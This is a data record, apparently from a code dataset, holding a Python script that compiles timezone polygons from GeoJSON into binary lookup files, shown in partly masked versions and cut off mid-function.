print('the shortcuts make up', percent(shortcut_space, total_space), '% of the data')
print('holes make up', percent(hole_space, total_space), '% of the data')
print('Success!')
return
if __name__ == '__main__':
# parsing the data from the .json into RAM
parse_polygons_from_json(path=INPUT_JSON_FILE_NAME)
# update all the zone names and set the right ids to be written in the poly_zone_ids.bin
# sort data according to zone_id
update_zone_names(path=TIMEZONE_NAMES_FILE)
# IMPORTANT: import the newly compiled timezone_names pickle!
# the compilation process needs the new version of the timezone names
with open(abspath(join(__file__, pardir, TIMEZONE_NAMES_FILE)), 'r') as f:
timezone_names = json.loads(f.read())
# compute shortcuts and write everything into the binaries
compile_binaries()
|
normal
|
{
"blob_id": "52e43f795c864340734de2640e3c1a70b05e8ea0",
"index": 7248,
"step-1": "<mask token>\n\n\ndef x_shortcut(lng):\n return floor((lng + 180) * NR_SHORTCUTS_PER_LNG)\n\n\ndef y_shortcut(lat):\n return floor((90 - lat) * NR_SHORTCUTS_PER_LAT)\n\n\ndef big_zone(xmax, xmin, ymax, ymin):\n return (xmax - xmin > 2 / NR_SHORTCUTS_PER_LNG and ymax - ymin > 2 /\n NR_SHORTCUTS_PER_LAT)\n\n\n<mask token>\n\n\ndef contained(x, y, x_coords, y_coords):\n return inside_polygon(x, y, [x_coords, y_coords])\n\n\ndef unique(iterable):\n out = []\n for i in iterable:\n if i not in out:\n out.append(i)\n return out\n\n\n<mask token>\n\n\ndef get_shortcuts(x, y):\n result = shortcuts.get((x, y))\n if result is None:\n return []\n else:\n return result\n\n\n<mask token>\n\n\ndef polys_of_one_zone():\n for i in range(len(timezone_names)):\n start = poly_nr2zone_id[i]\n end = poly_nr2zone_id[i + 1]\n yield list(range(start, end))\n\n\ndef replace_entry(iterable, entry, substitute):\n for i in range(len(iterable)):\n if iterable[i] == entry:\n iterable[i] = substitute\n return iterable\n\n\n<mask token>\n\n\ndef parse_polygons_from_json(path=INPUT_JSON_FILE_NAME):\n global amount_of_holes\n global nr_of_lines\n global poly_zone_ids\n print('Parsing data from {}\\nthis could take a while...\\n'.format(path))\n tz_list = json.loads(open(path).read()).get('features')\n polygon_counter = 0\n current_zone_id = 0\n print('holes found at: (poly_nr zone_name)')\n for tz_dict in tz_list:\n if DEBUG and polygon_counter > DEBUG_POLY_STOP:\n break\n tz_name = tz_dict.get('properties').get('tzid')\n all_tz_names.append(tz_name)\n geometry = tz_dict.get('geometry')\n if geometry.get('type') == 'MultiPolygon':\n multipolygon = geometry.get('coordinates')\n else:\n multipolygon = [geometry.get('coordinates')]\n for poly_with_hole in multipolygon:\n x_coords, y_coords = list(zip(*poly_with_hole.pop(0)))\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_coords.append((x_coords, y_coords))\n all_lengths.append(len(x_coords))\n all_boundaries.append((max(x_coords), min(x_coords), max(\n y_coords), min(y_coords)))\n poly_zone_ids.append(current_zone_id)\n for hole in poly_with_hole:\n print(polygon_counter, tz_name)\n amount_of_holes += 1\n polynrs_of_holes.append(polygon_counter)\n x_coords, y_coords = list(zip(*hole))\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_holes.append((x_coords, y_coords))\n all_hole_lengths.append(len(x_coords))\n polygon_counter += 1\n current_zone_id += 1\n if max(all_lengths) >= 2 ** (8 * NR_BYTES_I):\n raise ValueError(\n 'amount of coords cannot be represented by int32 in poly_coord_amount.bin:'\n , max(all_lengths))\n if max(all_hole_lengths) >= 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'amount of coords cannot be represented by short (int16) in hole_coord_amount.bin:'\n , max(all_hole_lengths))\n nr_of_lines = len(all_lengths)\n if polygon_counter != nr_of_lines:\n raise ValueError(\n 'polygon counter and entry number in all_length is different:',\n polygon_counter, nr_of_lines)\n if nr_of_lines >= 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'polygon id cannot be encoded as short (int16) in hole_coord_amount.bin! there are'\n , nr_of_lines, 'polygons')\n if poly_zone_ids[-1] > 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'zone id cannot be encoded as char (int8). the last id is',\n poly_zone_ids[-1])\n if 0 in all_lengths:\n raise ValueError()\n print('... parsing done.')\n print('maximal amount of coordinates in one polygon:', max(all_lengths))\n print('amount_of_holes:', amount_of_holes)\n print('amount of polygons:', nr_of_lines)\n print('\\n')\n\n\ndef update_zone_names(path=TIMEZONE_NAMES_FILE):\n global poly_zone_ids\n global list_of_pointers\n global all_boundaries\n global all_coords\n global all_lengths\n global polynrs_of_holes\n print('updating the zone names in {} now...'.format(path))\n with open(abspath(path), 'w') as f:\n f.write(json.dumps(all_tz_names))\n print('...Done.\\n\\nComputing where zones start and end...')\n i = 0\n last_id = -1\n for zone_id in poly_zone_ids:\n if zone_id != last_id:\n poly_nr2zone_id.append(i)\n if zone_id < last_id:\n raise ValueError()\n last_id = zone_id\n i += 1\n poly_nr2zone_id.append(i)\n print('...Done.\\n')\n\n\ndef compile_binaries():\n global nr_of_lines\n global shortcuts\n\n def print_shortcut_statistics():\n frequencies = []\n max_val = max(*nr_of_entries_in_shortcut)\n print('shortcut statistics:')\n print('highest entry amount is', max_val)\n while max_val >= 0:\n frequencies.append(nr_of_entries_in_shortcut.count(max_val))\n max_val -= 1\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max entries):')\n print(frequencies)\n empty_shortcuts = frequencies[0]\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print(percent(empty_shortcuts, amount_of_shortcuts),\n '% of all shortcuts are empty\\n')\n amount_of_different_zones = []\n for entry in shortcut_entries:\n registered_zone_ids = []\n for polygon_nr in entry:\n id = poly_zone_ids[polygon_nr]\n if id not in registered_zone_ids:\n registered_zone_ids.append(id)\n amount_of_different_zones.append(len(registered_zone_ids))\n frequencies = []\n max_val = max(*amount_of_different_zones)\n print('highest amount of different zones in one shortcut is', max_val)\n while max_val >= 1:\n frequencies.append(amount_of_different_zones.count(max_val))\n max_val -= 1\n frequencies.append(empty_shortcuts)\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max):')\n print(frequencies)\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print('--------------------------------\\n')\n\n def included_shortcut_row_nrs(max_lat, min_lat):\n return list(range(y_shortcut(max_lat), y_shortcut(min_lat) + 1))\n\n def included_shortcut_column_nrs(max_lng, min_lng):\n return list(range(x_shortcut(min_lng), x_shortcut(max_lng) + 1))\n\n def longitudes_to_check(max_lng, min_lng):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LNG\n current = ceil(min_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n end = floor(max_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n while current < end:\n output_list.append(current)\n current += step\n output_list.append(end)\n return output_list\n\n def latitudes_to_check(max_lat, min_lat):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LAT\n current = ceil(min_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n end = floor(max_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n while current < end:\n output_list.append(current)\n current += step\n output_list.append(end)\n return output_list\n\n def compute_x_intersection(y, x1, x2, y1, y2):\n \"\"\"returns the x intersection from a horizontal line in y with the line from x1,y1 to x1,y2\n \"\"\"\n delta_y = y2 - y1\n if delta_y == 0:\n return x1\n return (y - y1) * (x2 - x1) / delta_y + x1\n\n def compute_y_intersection(x, x1, x2, y1, y2):\n \"\"\"returns the y intersection from a vertical line in x with the line from x1,y1 to x1,y2\n \"\"\"\n delta_x = x2 - x1\n if delta_x == 0:\n return x1\n return (x - x1) * (y2 - y1) / delta_x + y1\n\n def x_intersections(y, x_coords, y_coords):\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if y_coords[i] <= y:\n if y_coords[iplus1] > y:\n intersects.append(compute_x_intersection(y, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n elif y_coords[iplus1] <= y:\n intersects.append(compute_x_intersection(y, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n return intersects\n\n def y_intersections(x, x_coords, y_coords):\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if x_coords[i] <= x:\n if x_coords[iplus1] > x:\n intersects.append(compute_y_intersection(x, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n elif x_coords[iplus1] <= x:\n intersects.append(compute_y_intersection(x, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n return intersects\n\n def compute_exact_shortcuts(xmax, xmin, ymax, ymin, line):\n shortcuts_for_line = set()\n x_longs, y_longs = ints_of(line)\n y_longs.append(y_longs[0])\n x_longs.append(x_longs[0])\n step = 1 / NR_SHORTCUTS_PER_LAT\n for lat in latitudes_to_check(ymax, ymin):\n intersects = sorted([int2coord(x) for x in x_intersections(\n coord2int(lat), x_longs, y_longs)])\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError(\n 'an uneven number of intersections has been accounted')\n for i in range(0, nr_of_intersects, 2):\n possible_longitudes = []\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n if contained(coord2int(intersection_in), coord2int(lat) +\n 1, x_longs, y_longs):\n shortcuts_for_line.add((x_shortcut(intersection_in),\n y_shortcut(lat) - 1))\n shortcuts_for_line.add((x_shortcut(intersection_in),\n y_shortcut(lat)))\n else:\n possible_y_shortcut = y_shortcut(lat)\n middle = intersection_in + (intersection_out -\n intersection_in) / 2\n if contained(coord2int(middle), coord2int(lat) + 1,\n x_longs, y_longs):\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n possible_longitudes.append(intersection_out)\n possible_y_shortcut_min1 = possible_y_shortcut - 1\n for possible_x_coord in possible_longitudes:\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut))\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut_min1))\n else:\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n possible_longitudes.append(intersection_out)\n for possible_x_coord in possible_longitudes:\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut))\n step = 1 / NR_SHORTCUTS_PER_LAT\n for lng in longitudes_to_check(xmax, xmin):\n intersects = sorted([int2coord(y) for y in y_intersections(\n coord2int(lng), x_longs, y_longs)])\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError(\n 'an uneven number of intersections has been accounted')\n possible_latitudes = []\n for i in range(0, nr_of_intersects, 2):\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n if contained(coord2int(lng) - 1, coord2int(\n intersection_in), x_longs, y_longs):\n shortcuts_for_line.add((x_shortcut(lng) - 1,\n y_shortcut(intersection_in)))\n shortcuts_for_line.add((x_shortcut(lng), y_shortcut(\n intersection_in)))\n else:\n possible_x_shortcut = x_shortcut(lng)\n middle = intersection_in + (intersection_out -\n intersection_in) / 2\n if contained(coord2int(lng) - 1, coord2int(middle),\n x_longs, y_longs):\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n possible_latitudes.append(intersection_out)\n possible_x_shortcut_min1 = possible_x_shortcut - 1\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut,\n y_shortcut(possible_latitude)))\n shortcuts_for_line.add((\n possible_x_shortcut_min1, y_shortcut(\n possible_latitude)))\n else:\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n possible_latitudes.append(intersection_out)\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut,\n y_shortcut(possible_latitude)))\n return shortcuts_for_line\n\n def construct_shortcuts():\n print('building shortucts...')\n print('currently at polygon nr:')\n line = 0\n for xmax, xmin, ymax, ymin in all_boundaries:\n if line % 100 == 0:\n print(line)\n column_nrs = included_shortcut_column_nrs(xmax, xmin)\n row_nrs = included_shortcut_row_nrs(ymax, ymin)\n if big_zone(xmax, xmin, ymax, ymin):\n shortcuts_for_line = compute_exact_shortcuts(xmax, xmin,\n ymax, ymin, line)\n min_x_shortcut = column_nrs[0]\n max_x_shortcut = column_nrs[-1]\n min_y_shortcut = row_nrs[0]\n max_y_shortcut = row_nrs[-1]\n shortcuts_to_remove = []\n for x, y in shortcuts_for_line:\n if (x < min_x_shortcut or x > max_x_shortcut or y <\n min_y_shortcut or y > max_y_shortcut):\n shortcuts_to_remove.append((x, y))\n for s in shortcuts_to_remove:\n shortcuts_for_line.remove(s)\n if len(shortcuts_for_line) > len(column_nrs) * len(row_nrs):\n raise ValueError(\n 'there are more shortcuts than before now. there is something wrong with the algorithm!'\n )\n if len(shortcuts_for_line) < 3:\n raise ValueError(\n 'algorithm not valid! less than 3 zones detected (should be at least 3)'\n )\n else:\n shortcuts_for_line = []\n for column_nr in column_nrs:\n for row_nr in row_nrs:\n shortcuts_for_line.append((column_nr, row_nr))\n for shortcut in shortcuts_for_line:\n shortcuts[shortcut] = shortcuts.get(shortcut, []) + [line]\n line += 1\n start_time = datetime.now()\n construct_shortcuts()\n end_time = datetime.now()\n print('calculating the shortcuts took:', end_time - start_time, '\\n')\n nr_of_floats = 2 * sum(all_lengths)\n nr_of_entries_in_shortcut = []\n shortcut_entries = []\n amount_filled_shortcuts = 0\n\n def sort_poly_shortcut(poly_nrs):\n polygon_ids = [poly_zone_ids[poly_nr] for poly_nr in poly_nrs]\n id_freq = [polygon_ids.count(id) for id in polygon_ids]\n zipped = list(zip(poly_nrs, polygon_ids, id_freq))\n sort = sorted(sorted(zipped, key=lambda x: x[1]), key=lambda x: x[2])\n return [x[0] for x in sort]\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[x, y]\n shortcut_entries.append(sort_poly_shortcut(\n shortcuts_this_entry))\n amount_filled_shortcuts += 1\n nr_of_entries_in_shortcut.append(len(shortcuts_this_entry))\n except KeyError:\n nr_of_entries_in_shortcut.append(0)\n amount_of_shortcuts = len(nr_of_entries_in_shortcut)\n print_shortcut_statistics()\n if (amount_of_shortcuts != 360 * 180 * NR_SHORTCUTS_PER_LNG *\n NR_SHORTCUTS_PER_LAT):\n print(amount_of_shortcuts)\n raise ValueError('this number of shortcut zones is wrong')\n print('The number of filled shortcut zones are:',\n amount_filled_shortcuts, '(=', round(amount_filled_shortcuts /\n amount_of_shortcuts * 100, 2), '% of all shortcuts)')\n shortcut_space = (360 * NR_SHORTCUTS_PER_LNG * 180 *\n NR_SHORTCUTS_PER_LAT * (NR_BYTES_H + NR_BYTES_I))\n for nr in nr_of_entries_in_shortcut:\n shortcut_space += NR_BYTES_H * nr\n print('The number of polygons is:', nr_of_lines)\n print('The number of floats in all the polygons is (2 per point):',\n nr_of_floats)\n path = 'poly_nr2zone_id.bin'\n print('writing file', path)\n output_file = open(path, 'wb')\n for zone_id in poly_nr2zone_id:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n print('Done\\n')\n path = 'poly_zone_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for zone_id in poly_zone_ids:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n path = 'poly_max_values.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for xmax, xmin, ymax, ymin in all_boundaries:\n output_file.write(pack(b'<iiii', coord2int(xmax), coord2int(xmin),\n coord2int(ymax), coord2int(ymin)))\n output_file.close()\n path = 'poly_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n addresses = []\n i = 0\n for x_coords, y_coords in all_coords:\n addresses.append(output_file.tell())\n if all_lengths[i] != len(x_coords):\n raise ValueError('x_coords do not have the expected length!',\n all_lengths[i], len(x_coords))\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n i += 1\n output_file.close()\n path = 'poly_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for adr in addresses:\n output_file.write(pack(b'<I', adr))\n output_file.close()\n path = 'poly_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_lengths:\n output_file.write(pack(b'<I', length))\n output_file.close()\n path = 'shortcuts_entry_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr > 300:\n raise ValueError('There are too many polygons in this shortcut:',\n nr)\n output_file.write(pack(b'<H', nr))\n output_file.close()\n adr = 0\n path = 'shortcuts_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr == 0:\n output_file.write(pack(b'<I', 0))\n else:\n output_file.write(pack(b'<I', adr))\n adr += 2 * nr\n output_file.close()\n path = 'shortcuts_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for entries in shortcut_entries:\n for entry in entries:\n if entry > nr_of_lines:\n raise ValueError(entry)\n output_file.write(pack(b'<H', entry))\n output_file.close()\n path = 'shortcuts_unique_id.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n if poly_zone_ids[-1] >= INVALID_ZONE_ID:\n raise ValueError(\n 'There are too many zones for this data type (H). The shortcuts_unique_id file need a Invalid Id!'\n )\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[x, y]\n unique_id = poly_zone_ids[shortcuts_this_entry[0]]\n for nr in shortcuts_this_entry:\n if poly_zone_ids[nr] != unique_id:\n unique_id = INVALID_ZONE_ID\n break\n output_file.write(pack(b'<H', unique_id))\n except KeyError:\n output_file.write(pack(b'<H', INVALID_ZONE_ID))\n output_file.close()\n hole_space = 0\n path = 'hole_poly_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n i = 0\n for line in polynrs_of_holes:\n if line > nr_of_lines:\n raise ValueError(line, nr_of_lines)\n output_file.write(pack(b'<H', line))\n i += 1\n hole_space += output_file.tell()\n output_file.close()\n if i > amount_of_holes:\n raise ValueError('There are more related lines than holes.')\n path = 'hole_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<H', length))\n hole_space += output_file.tell()\n output_file.close()\n adr = 0\n path = 'hole_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<I', adr))\n adr += 2 * NR_BYTES_I * length\n hole_space += output_file.tell()\n output_file.close()\n path = 'hole_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for x_coords, y_coords in all_holes:\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n hole_space += output_file.tell()\n output_file.close()\n polygon_space = nr_of_floats * NR_BYTES_I\n total_space = polygon_space + hole_space + shortcut_space\n print('the polygon data makes up', percent(polygon_space, total_space),\n '% of the data')\n print('the shortcuts make up', percent(shortcut_space, total_space),\n '% of the data')\n print('holes make up', percent(hole_space, total_space), '% of the data')\n print('Success!')\n return\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef x_shortcut(lng):\n return floor((lng + 180) * NR_SHORTCUTS_PER_LNG)\n\n\ndef y_shortcut(lat):\n return floor((90 - lat) * NR_SHORTCUTS_PER_LAT)\n\n\ndef big_zone(xmax, xmin, ymax, ymin):\n return (xmax - xmin > 2 / NR_SHORTCUTS_PER_LNG and ymax - ymin > 2 /\n NR_SHORTCUTS_PER_LAT)\n\n\ndef percent(numerator, denominator):\n return round(numerator / denominator * 100, 2)\n\n\n<mask token>\n\n\ndef ints_of(line=0):\n x_coords, y_coords = all_coords[line]\n return [coord2int(x) for x in x_coords], [coord2int(x) for x in y_coords]\n\n\ndef contained(x, y, x_coords, y_coords):\n return inside_polygon(x, y, [x_coords, y_coords])\n\n\ndef unique(iterable):\n out = []\n for i in iterable:\n if i not in out:\n out.append(i)\n return out\n\n\n<mask token>\n\n\ndef get_shortcuts(x, y):\n result = shortcuts.get((x, y))\n if result is None:\n return []\n else:\n return result\n\n\n<mask token>\n\n\ndef polys_of_one_zone():\n for i in range(len(timezone_names)):\n start = poly_nr2zone_id[i]\n end = poly_nr2zone_id[i + 1]\n yield list(range(start, end))\n\n\ndef replace_entry(iterable, entry, substitute):\n for i in range(len(iterable)):\n if iterable[i] == entry:\n iterable[i] = substitute\n return iterable\n\n\n<mask token>\n\n\ndef parse_polygons_from_json(path=INPUT_JSON_FILE_NAME):\n global amount_of_holes\n global nr_of_lines\n global poly_zone_ids\n print('Parsing data from {}\\nthis could take a while...\\n'.format(path))\n tz_list = json.loads(open(path).read()).get('features')\n polygon_counter = 0\n current_zone_id = 0\n print('holes found at: (poly_nr zone_name)')\n for tz_dict in tz_list:\n if DEBUG and polygon_counter > DEBUG_POLY_STOP:\n break\n tz_name = tz_dict.get('properties').get('tzid')\n all_tz_names.append(tz_name)\n geometry = tz_dict.get('geometry')\n if geometry.get('type') == 'MultiPolygon':\n multipolygon = geometry.get('coordinates')\n else:\n multipolygon = [geometry.get('coordinates')]\n for poly_with_hole in multipolygon:\n x_coords, y_coords = list(zip(*poly_with_hole.pop(0)))\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_coords.append((x_coords, y_coords))\n all_lengths.append(len(x_coords))\n all_boundaries.append((max(x_coords), min(x_coords), max(\n y_coords), min(y_coords)))\n poly_zone_ids.append(current_zone_id)\n for hole in poly_with_hole:\n print(polygon_counter, tz_name)\n amount_of_holes += 1\n polynrs_of_holes.append(polygon_counter)\n x_coords, y_coords = list(zip(*hole))\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_holes.append((x_coords, y_coords))\n all_hole_lengths.append(len(x_coords))\n polygon_counter += 1\n current_zone_id += 1\n if max(all_lengths) >= 2 ** (8 * NR_BYTES_I):\n raise ValueError(\n 'amount of coords cannot be represented by int32 in poly_coord_amount.bin:'\n , max(all_lengths))\n if max(all_hole_lengths) >= 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'amount of coords cannot be represented by short (int16) in hole_coord_amount.bin:'\n , max(all_hole_lengths))\n nr_of_lines = len(all_lengths)\n if polygon_counter != nr_of_lines:\n raise ValueError(\n 'polygon counter and entry number in all_length is different:',\n polygon_counter, nr_of_lines)\n if nr_of_lines >= 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'polygon id cannot be encoded as short (int16) in hole_coord_amount.bin! there are'\n , nr_of_lines, 'polygons')\n if poly_zone_ids[-1] > 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'zone id cannot be encoded as char (int8). the last id is',\n poly_zone_ids[-1])\n if 0 in all_lengths:\n raise ValueError()\n print('... parsing done.')\n print('maximal amount of coordinates in one polygon:', max(all_lengths))\n print('amount_of_holes:', amount_of_holes)\n print('amount of polygons:', nr_of_lines)\n print('\\n')\n\n\ndef update_zone_names(path=TIMEZONE_NAMES_FILE):\n global poly_zone_ids\n global list_of_pointers\n global all_boundaries\n global all_coords\n global all_lengths\n global polynrs_of_holes\n print('updating the zone names in {} now...'.format(path))\n with open(abspath(path), 'w') as f:\n f.write(json.dumps(all_tz_names))\n print('...Done.\\n\\nComputing where zones start and end...')\n i = 0\n last_id = -1\n for zone_id in poly_zone_ids:\n if zone_id != last_id:\n poly_nr2zone_id.append(i)\n if zone_id < last_id:\n raise ValueError()\n last_id = zone_id\n i += 1\n poly_nr2zone_id.append(i)\n print('...Done.\\n')\n\n\ndef compile_binaries():\n global nr_of_lines\n global shortcuts\n\n def print_shortcut_statistics():\n frequencies = []\n max_val = max(*nr_of_entries_in_shortcut)\n print('shortcut statistics:')\n print('highest entry amount is', max_val)\n while max_val >= 0:\n frequencies.append(nr_of_entries_in_shortcut.count(max_val))\n max_val -= 1\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max entries):')\n print(frequencies)\n empty_shortcuts = frequencies[0]\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print(percent(empty_shortcuts, amount_of_shortcuts),\n '% of all shortcuts are empty\\n')\n amount_of_different_zones = []\n for entry in shortcut_entries:\n registered_zone_ids = []\n for polygon_nr in entry:\n id = poly_zone_ids[polygon_nr]\n if id not in registered_zone_ids:\n registered_zone_ids.append(id)\n amount_of_different_zones.append(len(registered_zone_ids))\n frequencies = []\n max_val = max(*amount_of_different_zones)\n print('highest amount of different zones in one shortcut is', max_val)\n while max_val >= 1:\n frequencies.append(amount_of_different_zones.count(max_val))\n max_val -= 1\n frequencies.append(empty_shortcuts)\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max):')\n print(frequencies)\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print('--------------------------------\\n')\n\n def included_shortcut_row_nrs(max_lat, min_lat):\n return list(range(y_shortcut(max_lat), y_shortcut(min_lat) + 1))\n\n def included_shortcut_column_nrs(max_lng, min_lng):\n return list(range(x_shortcut(min_lng), x_shortcut(max_lng) + 1))\n\n def longitudes_to_check(max_lng, min_lng):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LNG\n current = ceil(min_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n end = floor(max_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n while current < end:\n output_list.append(current)\n current += step\n output_list.append(end)\n return output_list\n\n def latitudes_to_check(max_lat, min_lat):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LAT\n current = ceil(min_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n end = floor(max_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n while current < end:\n output_list.append(current)\n current += step\n output_list.append(end)\n return output_list\n\n def compute_x_intersection(y, x1, x2, y1, y2):\n \"\"\"returns the x intersection from a horizontal line in y with the line from x1,y1 to x1,y2\n \"\"\"\n delta_y = y2 - y1\n if delta_y == 0:\n return x1\n return (y - y1) * (x2 - x1) / delta_y + x1\n\n def compute_y_intersection(x, x1, x2, y1, y2):\n \"\"\"returns the y intersection from a vertical line in x with the line from x1,y1 to x1,y2\n \"\"\"\n delta_x = x2 - x1\n if delta_x == 0:\n return x1\n return (x - x1) * (y2 - y1) / delta_x + y1\n\n def x_intersections(y, x_coords, y_coords):\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if y_coords[i] <= y:\n if y_coords[iplus1] > y:\n intersects.append(compute_x_intersection(y, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n elif y_coords[iplus1] <= y:\n intersects.append(compute_x_intersection(y, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n return intersects\n\n def y_intersections(x, x_coords, y_coords):\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if x_coords[i] <= x:\n if x_coords[iplus1] > x:\n intersects.append(compute_y_intersection(x, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n elif x_coords[iplus1] <= x:\n intersects.append(compute_y_intersection(x, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n return intersects\n\n def compute_exact_shortcuts(xmax, xmin, ymax, ymin, line):\n shortcuts_for_line = set()\n x_longs, y_longs = ints_of(line)\n y_longs.append(y_longs[0])\n x_longs.append(x_longs[0])\n step = 1 / NR_SHORTCUTS_PER_LAT\n for lat in latitudes_to_check(ymax, ymin):\n intersects = sorted([int2coord(x) for x in x_intersections(\n coord2int(lat), x_longs, y_longs)])\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError(\n 'an uneven number of intersections has been accounted')\n for i in range(0, nr_of_intersects, 2):\n possible_longitudes = []\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n if contained(coord2int(intersection_in), coord2int(lat) +\n 1, x_longs, y_longs):\n shortcuts_for_line.add((x_shortcut(intersection_in),\n y_shortcut(lat) - 1))\n shortcuts_for_line.add((x_shortcut(intersection_in),\n y_shortcut(lat)))\n else:\n possible_y_shortcut = y_shortcut(lat)\n middle = intersection_in + (intersection_out -\n intersection_in) / 2\n if contained(coord2int(middle), coord2int(lat) + 1,\n x_longs, y_longs):\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n possible_longitudes.append(intersection_out)\n possible_y_shortcut_min1 = possible_y_shortcut - 1\n for possible_x_coord in possible_longitudes:\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut))\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut_min1))\n else:\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n possible_longitudes.append(intersection_out)\n for possible_x_coord in possible_longitudes:\n 